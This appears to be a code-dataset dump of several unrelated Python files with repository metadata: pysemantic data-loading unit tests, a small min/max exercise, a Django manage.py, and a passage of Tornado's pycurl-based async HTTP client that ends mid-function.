@unittest.skipIf(OPENPYXL_NOT_INSTALLED, "Loading Excel files requires openpyxl.")
def test_load_excel_multisheet(self):
"""Test combining multiple sheets into a single dataframe."""
tempdir = tempfile.mkdtemp()
spreadsheet = op.join(tempdir, "multifile_iris.xlsx")
iris = self.project.load_dataset("iris")
with pd.ExcelWriter(spreadsheet) as writer:
iris.to_excel(writer, "iris1", index=False)
iris.to_excel(writer, "iris2", index=False)
schema = {'iris': {'path': spreadsheet, 'sheetname': ['iris1', 'iris2'],
'dataframe_rules': {'drop_duplicates': False}}}
schema_fpath = op.join(tempdir, "multi_iris.yaml")
with open(schema_fpath, "w") as fout:
yaml.dump(schema, fout, Dumper=Dumper, default_flow_style=False)
pr.add_project("multi_iris", schema_fpath)
try:
ideal = pd.concat((iris, iris), axis=0)
actual = pr.Project('multi_iris').load_dataset("iris")
self.assertDataFrameEqual(ideal, actual)
finally:
pr.remove_project("multi_iris")
shutil.rmtree(tempdir)
@unittest.skipIf(XLRD_NOT_INSTALLED, "Reading Excel files requires xlrd.")
def test_load_excel_sheetname(self):
"""Test if specifying the sheetname loads the correct dataframe."""
xl_project = pr.Project("test_excel")
ideal_iris = self.project.load_dataset("iris")
actual_iris = xl_project.load_dataset("iris_renamed")
self.assertDataFrameEqual(ideal_iris, actual_iris)
@unittest.skipIf(XLRD_NOT_INSTALLED, "Reading Excel files requires xlrd.")
def test_load_excel(self):
"""Test if excel spreadsheets are read properly from the schema."""
xl_project = pr.Project("test_excel")
ideal_iris = self.project.load_dataset("iris")
actual_iris = xl_project.load_dataset("iris")
self.assertDataFrameEqual(ideal_iris, actual_iris)
def test_nrows_callable(self):
"""Check if specifying the nrows argument as a callable works."""
nrows = lambda x: np.remainder(x, 2) == 0
iris_specs = pr.get_schema_specs("pysemantic", "iris")
iris_specs['nrows'] = nrows
project = pr.Project(schema={'iris': iris_specs})
loaded = project.load_dataset('iris')
self.assertEqual(loaded.shape[0], 75)
ideal_ix = np.arange(150, step=2)
np.testing.assert_allclose(ideal_ix, loaded.index.values)
def test_random_row_selection_within_range(self):
"""Check if randomly selecting rows within a range works."""
iris_specs = pr.get_schema_specs("pysemantic", "iris")
iris_specs['nrows'] = {'range': [25, 75], 'count': 10, 'random': True}
iris_specs['header'] = 0
del iris_specs['dtypes']
iris_specs['column_names'] = colnames(iris_specs['path'])
project = pr.Project(schema={'iris': iris_specs})
loaded = project.load_dataset('iris')
self.assertEqual(loaded.shape[0], 10)
ix = loaded.index.values
self.assertTrue(ix.max() <= 50)
def test_row_selection_range(self):
"""Check if a range of rows can be selected from the dataset."""
iris_specs = pr.get_schema_specs("pysemantic", "iris")
iris_specs['nrows'] = {'range': [25, 75]}
iris_specs['header'] = 0
del iris_specs['dtypes']
iris_specs['column_names'] = colnames(iris_specs['path'])
project = pr.Project(schema={'iris': iris_specs})
loaded = project.load_dataset('iris')
self.assertEqual(loaded.shape[0], 50)
ideal_ix = np.arange(50)
self.assertTrue(np.allclose(loaded.index.values, ideal_ix))
def test_row_selection_random_range(self):
"""Check if a range of rows can be selected from the dataset."""
iris_specs = pr.get_schema_specs("pysemantic", "iris")
iris_specs['nrows'] = {'range': [25, 75], 'random': True}
iris_specs['header'] = 0
del iris_specs['dtypes']
iris_specs['column_names'] = colnames(iris_specs['path'])
project = pr.Project(schema={'iris': iris_specs})
loaded = project.load_dataset('iris')
self.assertEqual(loaded.shape[0], 50)
ideal_ix = np.arange(50)
self.assertFalse(np.all(loaded.index.values == ideal_ix))
def test_random_row_directive(self):
"""Check if the schema for randomizing rows works."""
loaded = self.project.load_dataset("random_row_iris")
self.assertEqual(loaded.shape[0], 50)
ideal_ix = np.arange(50)
self.assertFalse(np.all(loaded.index.values == ideal_ix))
def test_random_row_selection(self):
iris_specs = pr.get_schema_specs("pysemantic", "iris")
iris_specs['nrows'] = dict(random=True, count=50)
project = pr.Project(schema={'iris': iris_specs})
loaded = project.load_dataset('iris')
self.assertEqual(loaded.shape[0], 50)
ideal_ix = np.arange(50)
self.assertFalse(np.all(loaded.index.values == ideal_ix))
def test_export_dataset_csv(self):
"""Test if the default csv exporter works."""
tempdir = tempfile.mkdtemp()
project = pr.Project("pysemantic")
try:
dataset = "iris"
outpath = op.join(tempdir, dataset + ".csv")
project.export_dataset(dataset, outpath=outpath)
self.assertTrue(op.exists(outpath))
loaded = pd.read_csv(outpath)
self.assertDataFrameEqual(loaded, project.load_dataset(dataset))
finally:
shutil.rmtree(tempdir)
def test_exclude_cols(self):
"""Test if importing data with excluded columns works."""
filepath = op.join(op.abspath(op.dirname(__file__)), "testdata",
"iris.csv")
specs = {'path': filepath, 'exclude_columns': ['Species']}
pr.add_dataset('pysemantic', 'excl_iris', specs)
try:
project = pr.Project("pysemantic")
loaded = project.load_dataset("excl_iris")
self.assertNotIn('Species', loaded.columns)
finally:
pr.remove_dataset("pysemantic", "excl_iris")
def test_column_postprocessors(self):
"""Test if postprocessors work on column data properly."""
filepath = op.join(op.abspath(op.dirname(__file__)), "testdata",
"iris.csv")
col_rules = {'Species': {'postprocessors': [_dummy_postproc]}}
specs = {'path': filepath, 'column_rules': col_rules}
pr.add_dataset("pysemantic", "postproc_iris", specs)
try:
project = pr.Project("pysemantic")
loaded = project.load_dataset("postproc_iris")
processed = loaded['Species']
self.assertNotIn("setosa", processed.unique())
finally:
pr.remove_dataset("pysemantic", "postproc_iris")
def test_na_reps(self):
"""Test if the NA representations are parsed properly."""
project = pr.Project("pysemantic")
loaded = project.load_dataset("bad_iris")
self.assertItemsEqual(loaded.shape, (300, 5))
def test_na_reps_list(self):
"""Test if NA values work when specified as a list."""
tempdir = tempfile.mkdtemp()
df = pd.DataFrame(np.random.rand(10, 2))
ix = np.random.randint(0, df.shape[0], size=(5,))
ix = np.unique(ix)
df.iloc[ix, 0] = "foo"
df.iloc[ix, 1] = "bar"
fpath = op.join(tempdir, "test_na.csv")
df.to_csv(fpath, index=False)
schema = {'path': fpath, 'na_values': ["foo", "bar"],
'dataframe_rules': {'drop_na': False,
'drop_duplicates': False}}
schema_fpath = op.join(tempdir, "test_na.yaml")
with open(schema_fpath, "w") as fid:
yaml.dump({'test_na': schema}, fid, Dumper=Dumper,
default_flow_style=False)
pr.add_project("test_na", schema_fpath)
try:
df = pr.Project("test_na").load_dataset("test_na")
self.assertEqual(pd.isnull(df).sum().sum(), ix.shape[0] * 2)
finally:
pr.remove_project("test_na")
shutil.rmtree(tempdir)
def test_global_na_reps(self):
"""Test is specifying a global NA value for a dataset works."""
tempdir = tempfile.mkdtemp()
df = pd.DataFrame(np.random.rand(10, 10))
ix = np.random.randint(0, df.shape[0], size=(5,))
ix = np.unique(ix)
for i in xrange(ix.shape[0]):
df.iloc[ix[i], ix[i]] = "foobar"
fpath = op.join(tempdir, "test_na.csv")
df.to_csv(fpath, index=False)
schema = {'path': fpath, 'na_values': "foobar",
'dataframe_rules': {'drop_na': False,
'drop_duplicates': False}}
schema_fpath = op.join(tempdir, "test_na.yaml")
with open(schema_fpath, "w") as fid:
yaml.dump({'test_na': schema}, fid, Dumper=Dumper,
default_flow_style=False)
pr.add_project("test_na", schema_fpath)
try:
df = pr.Project("test_na").load_dataset("test_na")
self.assertEqual(pd.isnull(df).sum().sum(), ix.shape[0])
finally:
pr.remove_project("test_na")
shutil.rmtree(tempdir)
def test_error_bad_lines_correction(self):
"""test if the correction for bad lines works."""
tempdir = tempfile.mkdtemp()
iris_path = op.join(op.abspath(op.dirname(__file__)), "testdata",
"iris.csv")
with open(iris_path, "r") as fid:
iris_lines = fid.readlines()
outpath = op.join(tempdir, "bad_iris.csv")
iris_lines[50] = iris_lines[50].rstrip() + ",0,23,\n"
with open(outpath, 'w') as fid:
fid.writelines(iris_lines)
data_dict = op.join(tempdir, "dummy_project.yaml")
specs = {'bad_iris': {'path': outpath}}
with open(data_dict, "w") as fid:
yaml.dump(specs, fid, Dumper=Dumper, default_flow_style=False)
pr.add_project('dummy_project', data_dict)
try:
project = pr.Project('dummy_project')
df = project.load_dataset('bad_iris')
self.assertItemsEqual(df.shape, (146, 5))
finally:
shutil.rmtree(tempdir)
pr.remove_project('dummy_project')
@unittest.skipIf(PYTABLES_NOT_INSTALLED, "HDF export requires PyTables.")
def test_export_dataset_hdf(self):
"""Test if exporting the dataset to hdf works."""
tempdir = tempfile.mkdtemp()
project = pr.Project("pysemantic")
try:
for dataset in project.datasets:
if dataset not in ("bad_iris", "random_row_iris"):
outpath = op.join(tempdir, dataset + ".h5")
project.export_dataset(dataset, outpath=outpath)
self.assertTrue(op.exists(outpath))
group = r'/{0}/{1}'.format(project.project_name, dataset)
loaded = pd.read_hdf(outpath, group)
self.assertDataFrameEqual(loaded,
project.load_dataset(dataset))
finally:
shutil.rmtree(tempdir)
def test_reload_data_dict(self):
"""Test if the reload_data_dict method works."""
project = pr.Project("pysemantic")
tempdir = tempfile.mkdtemp()
datapath = op.join(tempdir, "data.csv")
ideal = pd.DataFrame(np.random.randint(0, 9, size=(10, 5)),
columns=map(str, range(5)))
ideal.to_csv(datapath, index=False)
with open(TEST_DATA_DICT, "r") as fid:
specs = yaml.load(fid, Loader=Loader)
specs['fakedata'] = dict(path=datapath)
with open(TEST_DATA_DICT, "w") as fid:
yaml.dump(specs, fid, Dumper=Dumper)
try:
project.reload_data_dict()
actual = project.load_dataset("fakedata")
self.assertDataFrameEqual(ideal, actual)
finally:
shutil.rmtree(tempdir)
del specs['fakedata']
with open(TEST_DATA_DICT, "w") as fid:
yaml.dump(specs, fid, Dumper=Dumper)
def test_update_dataset(self):
"""Test if the update_dataset method works."""
tempdir = tempfile.mkdtemp()
_pr = pr.Project("pysemantic")
iris = _pr.load_dataset("iris")
x = np.random.random((150,))
y = np.random.random((150,))
iris['x'] = x
iris['y'] = y
org_cols = iris.columns.tolist()
outpath = op.join(tempdir, "iris.csv")
with open(TEST_DATA_DICT, "r") as fid:
org_specs = yaml.load(fid, Loader=Loader)
try:
_pr.update_dataset("iris", iris, path=outpath, sep='\t')
_pr = pr.Project("pysemantic")
iris = _pr.load_dataset("iris")
self.assertItemsEqual(org_cols, iris.columns.tolist())
iris_validator = _pr.validators['iris']
updated_args = iris_validator.parser_args
self.assertEqual(updated_args['dtype']['x'], float)
self.assertEqual(updated_args['dtype']['y'], float)
self.assertEqual(updated_args['sep'], '\t')
self.assertEqual(updated_args['filepath_or_buffer'], outpath)
finally:
shutil.rmtree(tempdir)
with open(TEST_DATA_DICT, "w") as fid:
yaml.dump(org_specs, fid, Dumper=Dumper,
default_flow_style=False)
def test_update_dataset_deleted_columns(self):
"""Test if the update dataset method removes column specifications."""
tempdir = tempfile.mkdtemp()
_pr = pr.Project("pysemantic")
iris = _pr.load_dataset("iris")
outpath = op.join(tempdir, "iris.csv")
with open(TEST_DATA_DICT, "r") as fid:
org_specs = yaml.load(fid, Loader=Loader)
try:
del iris['Species']
_pr.update_dataset("iris", iris, path=outpath)
pr_reloaded = pr.Project("pysemantic")
iris_reloaded = pr_reloaded.load_dataset("iris")
self.assertNotIn("Species", iris_reloaded.columns)
self.assertNotIn("Species", pr_reloaded.column_rules["iris"])
finally:
shutil.rmtree(tempdir)
with open(TEST_DATA_DICT, "w") as fid:
yaml.dump(org_specs, fid, Dumper=Dumper,
default_flow_style=False)
def test_regex_separator(self):
"""Test if the project properly loads a dataset when it encounters
regex separators.
"""
tempdir = tempfile.mkdtemp()
outfile = op.join(tempdir, "sample.txt")
data = ["col1"] + map(str, range(10))
with open(outfile, "w") as fileobj:
fileobj.write("\n".join(data))
specs = dict(path=outfile, delimiter=r'\n', dtypes={'col1': int})
pr.add_dataset("pysemantic", "sample_dataset", specs)
try:
with warnings.catch_warnings(record=True) as catcher:
_pr = pr.Project("pysemantic")
dframe = _pr.load_dataset("sample_dataset")
assert len(catcher) == 2
assert issubclass(catcher[1].category, ParserWarning)
data.remove("col1")
self.assertItemsEqual(map(int, data), dframe['col1'].tolist())
finally:
pr.remove_dataset("pysemantic", "sample_dataset")
shutil.rmtree(tempdir)
def test_load_dataset_wrong_dtypes_in_spec(self):
"""Test if the Loader can safely load columns that have a wrongly
specified data type in the schema.
"""
# Make a file with two columns, both specified as integers in the
# dtypes, but one has random string types.
x = np.random.randint(0, 10, size=(100, 2))
dframe = pd.DataFrame(x, columns=['a', 'b'])
tempdir = tempfile.mkdtemp()
outfile = op.join(tempdir, "testdata.csv")
_ix = np.random.randint(0, 100, size=(5,))
dframe['b'][_ix] = "aa"
dframe.to_csv(outfile, index=False)
specs = dict(delimiter=',', dtypes={'a': int, 'b': int}, path=outfile)
specfile = op.join(tempdir, "dict.yaml")
with open(specfile, "w") as fileobj:
yaml.dump({'testdata': specs}, fileobj, Dumper=Dumper,
default_flow_style=False)
pr.add_project("wrong_dtype", specfile)
try:
_pr = pr.Project("wrong_dtype")
with warnings.catch_warnings(record=True) as catcher:
dframe = _pr.load_dataset("testdata")
assert len(catcher) == 1
assert issubclass(catcher[-1].category, UserWarning)
finally:
pr.remove_project("wrong_dtype")
shutil.rmtree(tempdir)
def test_integer_col_na_values(self):
"""Test if the Loader can load columns with integers and NAs.
This is necessary because NaNs cannot be represented by integers."""
x = map(str, range(20))
x[13] = ""
df = pd.DataFrame.from_dict(dict(a=x, b=x))
tempdir = tempfile.mkdtemp()
outfile = op.join(tempdir, "testdata.csv")
df.to_csv(outfile, index=False)
specfile = op.join(tempdir, "dict.yaml")
specs = dict(delimiter=',', dtypes={'a': int, 'b': int}, path=outfile)
with open(specfile, "w") as fileobj:
yaml.dump({'testdata': specs}, fileobj, Dumper=Dumper,
default_flow_style=False)
pr.add_project("wrong_dtype", specfile)
try:
_pr = pr.Project("wrong_dtype")
df = _pr.load_dataset("testdata")
self.assertEqual(df['a'].dtype, float)
self.assertEqual(df['b'].dtype, float)
finally:
pr.remove_project("wrong_dtype")
shutil.rmtree(tempdir)
def test_load_dataset_missing_nrows(self):
"""Test if the project loads datasets properly if the nrows parameter
is not provided in the schema.
"""
# Modify the schema to remove the nrows
with open(TEST_DATA_DICT, "r") as fileobj:
org_specs = yaml.load(fileobj, Loader=Loader)
new_specs = deepcopy(org_specs)
for dataset_specs in new_specs.itervalues():
if "nrows" in dataset_specs:
del dataset_specs['nrows']
with open(TEST_DATA_DICT, "w") as fileobj:
yaml.dump(new_specs, fileobj, Dumper=Dumper,
default_flow_style=False)
try:
_pr = pr.Project("pysemantic")
dframe = pd.read_csv(**self.expected_specs['iris'])
loaded = _pr.load_dataset("iris")
self.assertDataFrameEqual(dframe, loaded)
dframe = pd.read_table(**self.expected_specs['person_activity'])
loaded = _pr.load_dataset("person_activity")
self.assertDataFrameEqual(loaded, dframe)
finally:
with open(TEST_DATA_DICT, "w") as fileobj:
yaml.dump(org_specs, fileobj, Dumper=Dumper,
default_flow_style=False)
def test_get_project_specs(self):
"""Test if the project manager gets all specifications correctly."""
specs = self.project.get_project_specs()
del specs['bad_iris']
del specs['random_row_iris']
del specs['multi_iris']
for name, argdict in specs.iteritems():
self.assertKwargsEqual(argdict, self.expected_specs[name])
def test_get_dataset_specs(self):
"""Check if the project manager produces specifications for each
dataset correctly.
"""
for name in ['iris', 'person_activity']:
self.assertKwargsEqual(self.project.get_dataset_specs(name),
self.expected_specs[name])
def test_get_multifile_dataset_specs(self):
"""Test if the multifile dataset specifications are valid."""
outargs = self.project.get_dataset_specs("multi_iris")
for argset in outargs:
argset['usecols'] = colnames(argset['filepath_or_buffer'])
self.assertTrue(isinstance(outargs, list))
self.assertEqual(len(outargs), len(self.expected_specs['multi_iris']))
for i in range(len(outargs)):
self.assertKwargsEqual(outargs[i],
self.expected_specs['multi_iris'][i])
def test_load_all(self):
"""Test if loading all datasets in a project works as expected."""
loaded = self.project.load_datasets()
self.assertItemsEqual(loaded.keys(), ('iris', 'person_activity',
'multi_iris', 'bad_iris',
'random_row_iris'))
dframe = pd.read_csv(**self.expected_specs['iris'])
self.assertDataFrameEqual(loaded['iris'], dframe)
dframe = pd.read_csv(**self.expected_specs['person_activity'])
self.assertDataFrameEqual(loaded['person_activity'], dframe)
dframes = [pd.read_csv(**args) for args in
self.expected_specs['multi_iris']]
dframes = [x.drop_duplicates() for x in dframes]
dframe = pd.concat(dframes)
dframe.set_index(np.arange(dframe.shape[0]), inplace=True)
self.assertDataFrameEqual(loaded['multi_iris'], dframe)
def test_init_project_yaml_dump(self):
"""Test initialization of Project class with the raw yaml dump."""
project_specs = pr.get_schema_specs('pysemantic')
project = pr.Project(schema=project_specs)
loaded = project.load_datasets()
self.assertItemsEqual(loaded.keys(), ('iris', 'person_activity',
'multi_iris', 'bad_iris',
'random_row_iris'))
dframe = pd.read_csv(**self.expected_specs['iris'])
self.assertDataFrameEqual(loaded['iris'], dframe)
dframe = pd.read_csv(**self.expected_specs['person_activity'])
self.assertDataFrameEqual(loaded['person_activity'], dframe)
dframes = [pd.read_csv(**args) for args in
self.expected_specs['multi_iris']]
dframes = [x.drop_duplicates() for x in dframes]
dframe = pd.concat(dframes)
dframe.set_index(np.arange(dframe.shape[0]), inplace=True)
self.assertDataFrameEqual(loaded['multi_iris'], dframe)
def test_dataset_colnames(self):
"""Check if the column names read by the Loader are correct."""
for name, sep in {'iris': ',', 'person_activity': '\t'}.iteritems():
loaded = self.project.load_dataset(name)
columns = loaded.columns.tolist()
spec_colnames = colnames(self.data_specs[name]['path'], sep=sep)
self.assertItemsEqual(spec_colnames, columns)
def test_dataset_coltypes(self):
"""Check whether the columns have the correct datatypes."""
for name in ['iris', 'person_activity']:
loaded = self.project.load_dataset(name)
for colname in loaded:
if loaded[colname].dtype == np.dtype('O'):
self.assertEqual(self.data_specs[name]['dtypes'][colname],
str)
elif loaded[colname].dtype == np.dtype('<M8[ns]'):
self.assertIn(colname, self.data_specs[name]['parse_dates'])
else:
self.assertEqual(loaded[colname].dtype,
self.data_specs[name]['dtypes'][colname])
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
643eb7f477425f02153c3d2c8d108744da4cae8e | 52cb25dca22292fce4d3907cc370098d7a57fcc2 | /BAEKJOON/1차원배열/10818_최소, 최대.py | 86667a7ec7f8aea5cf57f1648b87a1660e4cd302 | [] | no_license | shjang1013/Algorithm | c4fc4c52cbbd3b7ecf063c716f600d1dbfc40d1a | 33f2caa6339afc6fc53ea872691145effbce0309 | refs/heads/master | 2022-09-16T12:02:53.146884 | 2022-08-31T16:29:04 | 2022-08-31T16:29:04 | 227,843,135 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 121 | py | num = int(input())
test_case = list(map(int, input().split()))
print('{0} {1}'.format(min(test_case), max(test_case)))
| [
"[email protected]"
] | |
74df909a3eadb0de7ee6075b1ba1e97fbaab5606 | 0e726928cc61cc4b140bb81e4187f7588cba1622 | /manage.py | 0cb7605ed6afbf33322846dd0c1d656b02edac5a | [] | no_license | LeoKnox/djangoadv1 | 7a76652b4f59174b31f36f2b2f65662cdf17f05e | 82f5eb82728ec539a725a1460e387cd195af872e | refs/heads/main | 2022-12-28T23:26:55.682230 | 2020-10-17T22:22:52 | 2020-10-17T22:22:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 557 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "django_adv.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
655ca34106da480d21ec9bb6da7b33271375ad14 | a56a74b362b9263289aad96098bd0f7d798570a2 | /venv/lib/python3.8/site-packages/tornado/curl_httpclient.py | b81316c01b086b4136ec914a0494b394529a1c69 | [
"MIT"
] | permissive | yoonkt200/ml-theory-python | 5812d06841d30e1068f6592b5730a40e87801313 | 7643136230fd4f291b6e3dbf9fa562c3737901a2 | refs/heads/master | 2022-12-21T14:53:21.624453 | 2021-02-02T09:33:07 | 2021-02-02T09:33:07 | 132,319,537 | 13 | 14 | MIT | 2022-12-19T17:23:57 | 2018-05-06T08:17:45 | Python | UTF-8 | Python | false | false | 24,693 | py | #
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Non-blocking HTTP client implementation using pycurl."""
import collections
import functools
import logging
import pycurl # type: ignore
import threading
import time
from io import BytesIO
from tornado import httputil
from tornado import ioloop
from tornado.escape import utf8, native_str
from tornado.httpclient import (
HTTPRequest,
HTTPResponse,
HTTPError,
AsyncHTTPClient,
main,
)
from tornado.log import app_log
from typing import Dict, Any, Callable, Union
import typing
if typing.TYPE_CHECKING:
from typing import Deque, Tuple, Optional # noqa: F401
curl_log = logging.getLogger("tornado.curl_httpclient")
class CurlAsyncHTTPClient(AsyncHTTPClient):
def initialize( # type: ignore
self, max_clients: int = 10, defaults: Dict[str, Any] = None
) -> None:
super(CurlAsyncHTTPClient, self).initialize(defaults=defaults)
self._multi = pycurl.CurlMulti()
self._multi.setopt(pycurl.M_TIMERFUNCTION, self._set_timeout)
self._multi.setopt(pycurl.M_SOCKETFUNCTION, self._handle_socket)
self._curls = [self._curl_create() for i in range(max_clients)]
self._free_list = self._curls[:]
self._requests = (
collections.deque()
) # type: Deque[Tuple[HTTPRequest, Callable[[HTTPResponse], None], float]]
self._fds = {} # type: Dict[int, int]
self._timeout = None # type: Optional[object]
# libcurl has bugs that sometimes cause it to not report all
# relevant file descriptors and timeouts to TIMERFUNCTION/
# SOCKETFUNCTION. Mitigate the effects of such bugs by
# forcing a periodic scan of all active requests.
self._force_timeout_callback = ioloop.PeriodicCallback(
self._handle_force_timeout, 1000
)
self._force_timeout_callback.start()
# Work around a bug in libcurl 7.29.0: Some fields in the curl
# multi object are initialized lazily, and its destructor will
# segfault if it is destroyed without having been used. Add
# and remove a dummy handle to make sure everything is
# initialized.
dummy_curl_handle = pycurl.Curl()
self._multi.add_handle(dummy_curl_handle)
self._multi.remove_handle(dummy_curl_handle)
def close(self) -> None:
self._force_timeout_callback.stop()
if self._timeout is not None:
self.io_loop.remove_timeout(self._timeout)
for curl in self._curls:
curl.close()
self._multi.close()
super(CurlAsyncHTTPClient, self).close()
# Set below properties to None to reduce the reference count of current
# instance, because those properties hold some methods of current
# instance that will case circular reference.
self._force_timeout_callback = None # type: ignore
self._multi = None
def fetch_impl(
self, request: HTTPRequest, callback: Callable[[HTTPResponse], None]
) -> None:
self._requests.append((request, callback, self.io_loop.time()))
self._process_queue()
self._set_timeout(0)
def _handle_socket(self, event: int, fd: int, multi: Any, data: bytes) -> None:
"""Called by libcurl when it wants to change the file descriptors
it cares about.
"""
event_map = {
pycurl.POLL_NONE: ioloop.IOLoop.NONE,
pycurl.POLL_IN: ioloop.IOLoop.READ,
pycurl.POLL_OUT: ioloop.IOLoop.WRITE,
pycurl.POLL_INOUT: ioloop.IOLoop.READ | ioloop.IOLoop.WRITE,
}
if event == pycurl.POLL_REMOVE:
if fd in self._fds:
self.io_loop.remove_handler(fd)
del self._fds[fd]
else:
ioloop_event = event_map[event]
# libcurl sometimes closes a socket and then opens a new
# one using the same FD without giving us a POLL_NONE in
# between. This is a problem with the epoll IOLoop,
# because the kernel can tell when a socket is closed and
# removes it from the epoll automatically, causing future
# update_handler calls to fail. Since we can't tell when
# this has happened, always use remove and re-add
# instead of update.
if fd in self._fds:
self.io_loop.remove_handler(fd)
self.io_loop.add_handler(fd, self._handle_events, ioloop_event)
self._fds[fd] = ioloop_event
def _set_timeout(self, msecs: int) -> None:
"""Called by libcurl to schedule a timeout."""
if self._timeout is not None:
self.io_loop.remove_timeout(self._timeout)
self._timeout = self.io_loop.add_timeout(
self.io_loop.time() + msecs / 1000.0, self._handle_timeout
)
def _handle_events(self, fd: int, events: int) -> None:
"""Called by IOLoop when there is activity on one of our
file descriptors.
"""
action = 0
if events & ioloop.IOLoop.READ:
action |= pycurl.CSELECT_IN
if events & ioloop.IOLoop.WRITE:
action |= pycurl.CSELECT_OUT
while True:
try:
ret, num_handles = self._multi.socket_action(fd, action)
except pycurl.error as e:
ret = e.args[0]
if ret != pycurl.E_CALL_MULTI_PERFORM:
break
self._finish_pending_requests()
def _handle_timeout(self) -> None:
"""Called by IOLoop when the requested timeout has passed."""
self._timeout = None
while True:
try:
ret, num_handles = self._multi.socket_action(pycurl.SOCKET_TIMEOUT, 0)
except pycurl.error as e:
ret = e.args[0]
if ret != pycurl.E_CALL_MULTI_PERFORM:
break
self._finish_pending_requests()
# In theory, we shouldn't have to do this because curl will
# call _set_timeout whenever the timeout changes. However,
# sometimes after _handle_timeout we will need to reschedule
# immediately even though nothing has changed from curl's
# perspective. This is because when socket_action is
# called with SOCKET_TIMEOUT, libcurl decides internally which
# timeouts need to be processed by using a monotonic clock
# (where available) while tornado uses python's time.time()
# to decide when timeouts have occurred. When those clocks
# disagree on elapsed time (as they will whenever there is an
# NTP adjustment), tornado might call _handle_timeout before
# libcurl is ready. After each timeout, resync the scheduled
# timeout with libcurl's current state.
new_timeout = self._multi.timeout()
if new_timeout >= 0:
self._set_timeout(new_timeout)
def _handle_force_timeout(self) -> None:
"""Called by IOLoop periodically to ask libcurl to process any
events it may have forgotten about.
"""
while True:
try:
ret, num_handles = self._multi.socket_all()
except pycurl.error as e:
ret = e.args[0]
if ret != pycurl.E_CALL_MULTI_PERFORM:
break
self._finish_pending_requests()
def _finish_pending_requests(self) -> None:
"""Process any requests that were completed by the last
call to multi.socket_action.
"""
while True:
num_q, ok_list, err_list = self._multi.info_read()
for curl in ok_list:
self._finish(curl)
for curl, errnum, errmsg in err_list:
self._finish(curl, errnum, errmsg)
if num_q == 0:
break
self._process_queue()
def _process_queue(self) -> None:
while True:
started = 0
while self._free_list and self._requests:
started += 1
curl = self._free_list.pop()
(request, callback, queue_start_time) = self._requests.popleft()
curl.info = {
"headers": httputil.HTTPHeaders(),
"buffer": BytesIO(),
"request": request,
"callback": callback,
"queue_start_time": queue_start_time,
"curl_start_time": time.time(),
"curl_start_ioloop_time": self.io_loop.current().time(),
}
try:
self._curl_setup_request(
curl, request, curl.info["buffer"], curl.info["headers"]
)
except Exception as e:
# If there was an error in setup, pass it on
# to the callback. Note that allowing the
# error to escape here will appear to work
# most of the time since we are still in the
# caller's original stack frame, but when
# _process_queue() is called from
# _finish_pending_requests the exceptions have
# nowhere to go.
self._free_list.append(curl)
callback(HTTPResponse(request=request, code=599, error=e))
else:
self._multi.add_handle(curl)
if not started:
break
def _finish(
self, curl: pycurl.Curl, curl_error: int = None, curl_message: str = None
) -> None:
info = curl.info
curl.info = None
self._multi.remove_handle(curl)
self._free_list.append(curl)
buffer = info["buffer"]
if curl_error:
assert curl_message is not None
error = CurlError(curl_error, curl_message) # type: Optional[CurlError]
assert error is not None
code = error.code
effective_url = None
buffer.close()
buffer = None
else:
error = None
code = curl.getinfo(pycurl.HTTP_CODE)
effective_url = curl.getinfo(pycurl.EFFECTIVE_URL)
buffer.seek(0)
# the various curl timings are documented at
# http://curl.haxx.se/libcurl/c/curl_easy_getinfo.html
time_info = dict(
queue=info["curl_start_ioloop_time"] - info["queue_start_time"],
namelookup=curl.getinfo(pycurl.NAMELOOKUP_TIME),
connect=curl.getinfo(pycurl.CONNECT_TIME),
appconnect=curl.getinfo(pycurl.APPCONNECT_TIME),
pretransfer=curl.getinfo(pycurl.PRETRANSFER_TIME),
starttransfer=curl.getinfo(pycurl.STARTTRANSFER_TIME),
total=curl.getinfo(pycurl.TOTAL_TIME),
redirect=curl.getinfo(pycurl.REDIRECT_TIME),
)
try:
info["callback"](
HTTPResponse(
request=info["request"],
code=code,
headers=info["headers"],
buffer=buffer,
effective_url=effective_url,
error=error,
reason=info["headers"].get("X-Http-Reason", None),
request_time=self.io_loop.time() - info["curl_start_ioloop_time"],
start_time=info["curl_start_time"],
time_info=time_info,
)
)
except Exception:
self.handle_callback_exception(info["callback"])
def handle_callback_exception(self, callback: Any) -> None:
app_log.error("Exception in callback %r", callback, exc_info=True)
def _curl_create(self) -> pycurl.Curl:
curl = pycurl.Curl()
if curl_log.isEnabledFor(logging.DEBUG):
curl.setopt(pycurl.VERBOSE, 1)
curl.setopt(pycurl.DEBUGFUNCTION, self._curl_debug)
if hasattr(
pycurl, "PROTOCOLS"
): # PROTOCOLS first appeared in pycurl 7.19.5 (2014-07-12)
curl.setopt(pycurl.PROTOCOLS, pycurl.PROTO_HTTP | pycurl.PROTO_HTTPS)
curl.setopt(pycurl.REDIR_PROTOCOLS, pycurl.PROTO_HTTP | pycurl.PROTO_HTTPS)
return curl
def _curl_setup_request(
self,
curl: pycurl.Curl,
request: HTTPRequest,
buffer: BytesIO,
headers: httputil.HTTPHeaders,
) -> None:
curl.setopt(pycurl.URL, native_str(request.url))
# libcurl's magic "Expect: 100-continue" behavior causes delays
# with servers that don't support it (which include, among others,
# Google's OpenID endpoint). Additionally, this behavior has
# a bug in conjunction with the curl_multi_socket_action API
# (https://sourceforge.net/tracker/?func=detail&atid=100976&aid=3039744&group_id=976),
# which increases the delays. It's more trouble than it's worth,
# so just turn off the feature (yes, setting Expect: to an empty
# value is the official way to disable this)
if "Expect" not in request.headers:
request.headers["Expect"] = ""
# libcurl adds Pragma: no-cache by default; disable that too
if "Pragma" not in request.headers:
request.headers["Pragma"] = ""
curl.setopt(
pycurl.HTTPHEADER,
[
"%s: %s" % (native_str(k), native_str(v))
